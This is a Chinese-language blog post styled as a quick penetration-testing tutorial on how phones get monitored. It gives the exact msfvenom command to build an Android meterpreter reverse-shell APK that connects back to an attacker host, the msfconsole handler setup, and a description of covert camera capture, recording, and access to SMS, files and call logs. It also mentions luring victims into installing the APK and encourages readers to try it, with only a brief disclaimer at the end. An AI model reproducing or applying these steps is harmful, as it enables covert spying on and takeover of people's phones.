5min学渗透|你的手机是如何被监控的?

原创 丁永博 丁永博的成长日记 2022-02-28 13:45

01

背景

大家好，我是你们的老朋友，丁永博，本期带大家了解一下黑客是怎么入侵你的手机的。经常下载安装那种带颜色应用的老sp们应该注意一下哈。

02

制作恶意软件

使用以下命令生成一个apk安装包，（本次只是一个简单的apk，实际环境中会和其他应用绑定在一起）

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.17.203.188 LPORT=9999 R>yongbo.apk

172.x.x.x地址为kali地址，使用ifchonfig即可查询本机地址，9999为自定义监听端口号。

接下来就是如何诱导别人安装你的安装包了，本文就不展开了，感兴趣可以翻翻以前发的文章，有几个社会工程学小例子。

03

监听模块

还是老规矩，打开我们的美少妇（msf）模块  

msfconsole 

使用以下模块，配置本地监听地址和端口，然后进行监听

use exploit/multi/handler

set lport 9999

set lhost 192.168.10.206（和上面172地址一样，换网了所以变了）

set payload android/meterpreter/reverse_tcp

run

04

控制手机

当手机安装我们的恶意软件之后，出现meterpreter证明成功监听，可以输入？查看模块功能。

比如使用webcam_snap命令，可以调用手机摄像头实时拍照，并把照片传送到黑客的服务器上，手机不会有任何反应（本次实验因为没有做免杀，安装时手机可能提示该应用有病毒）另外我的照片有点粗糙，大家凑合看哈。

还有其他功能类似实时录音，实时传输监控画面、播放音视频、查看手机文件、查看通讯记录、短信、安装卸载应用之类的功能就不给大家演示了，基本能拿到手机的所有权限，感兴趣大家可以去试试。

01

要说的话

想要kali，可公众号回复kali，另如果需要交流可在公众号留言，看到我都会回复。

01

声明

本文提供的技术参数仅供学习或运维人员对内部系统进行测试提供参考，未经授权请勿用本文提供的技术进行破坏性测试，利用此文提供的信息造成的直接或间接损失，由使用者承担。

丁永博

喜欢作者